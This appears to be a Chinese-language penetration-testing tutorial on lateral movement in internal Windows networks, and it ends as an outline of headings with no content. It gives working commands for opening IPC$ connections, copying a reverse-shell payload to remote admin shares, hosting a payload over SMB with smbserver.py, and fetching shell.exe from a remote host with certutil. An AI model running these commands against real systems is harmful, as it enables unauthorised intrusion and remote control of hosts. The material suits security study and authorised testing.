内网渗透之横向移动

一、使用文件传输

1.1 网络共享

在网络资源共享中，有admin$\mathrm{系}\mathrm{统}\mathrm{目}\mathrm{录}\mathrm{共}\mathrm{享}，\mathrm{还}\mathrm{有}IPC$共享，是实战中通常建立的共享连接；建立IPC$共享需要以下两个条件：

1.远程主机开启了IPC连接
2.远程主机的139端口和445端口开放

执行以下命令就可以与远程主机建立IPC连接

net use \\10.10.10.19\IPC$ "password" /user:"username"

建立连接之后就可以使用命令了，比如

dir \\10.10.10.19\C$ 列出C盘的目录

将攻击载荷上传到目标主机

copy ./reverse_tcp.exe \\10.10.10.19\C$

1.2 搭建SMB服务器

在自己的服务器或者被控的主机上搭建一个SMB服务器，将攻击载荷放到SMB服务器的共享目录中，并指定UNC路径，让横向移动的目标主机远程加载SMB共享的文件。

在Linux上使用smbserver.py来搭建：

mkdir /root/share
python smbserver.py evilsmb /root/share -smb2support

执行上述命令即可搭建一个名为evilsmb 共享目录指向share的SMb匿名共享。

1.3 通过Windows自带工具

certutil -urlcache -split -f http://ip:port/shell.exe C:\reverse.exe

二、创建计划任务

2.1 常规利用流程

2.2 UNC路径加载执行

三、利用系统服务

3.1 创建远程服务

3.2 SCShell

3.3 UAC Remote Restritions